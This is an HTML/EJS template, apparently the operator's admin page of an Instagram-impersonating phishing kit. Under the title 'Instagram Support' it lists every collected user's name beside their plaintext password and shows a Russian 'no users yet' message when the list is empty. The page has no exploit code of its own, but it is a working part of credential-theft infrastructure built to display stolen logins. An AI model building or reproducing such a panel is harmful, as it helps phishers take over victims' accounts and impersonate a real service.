<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Instagram Support</title>
    <link rel="stylesheet" href="/assets/css/admin.css">
    <link rel="shortcut icon" href="/assets/favicon.ico" type="image/x-icon">
    <link rel="icon" href="/assets/favicon.ico" type="image/x-icon">
    <link href="https://fonts.googleapis.com/css?family=Hind|Kanit" rel="stylesheet">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
    <div class="container">
        <div class="users-container">
            <i class="fa fa-user"></i>
            <div class="user">
                name
                <span class="password">
                    password
                </span>
            </div>
            <%if (users.length > 0) {%>
                <% users.forEach(user => { %>
                    <div class="user">
                        <%= user.name%>
                        <span class="password">
                            <%= user.password%>
                        </span>
                    </div>
                <% }) %>
            <% } else { %>
                <h1 class="error">Еще нет пользователей</h1>
            <% } %>
        </div>
    </div>
</body>
</html>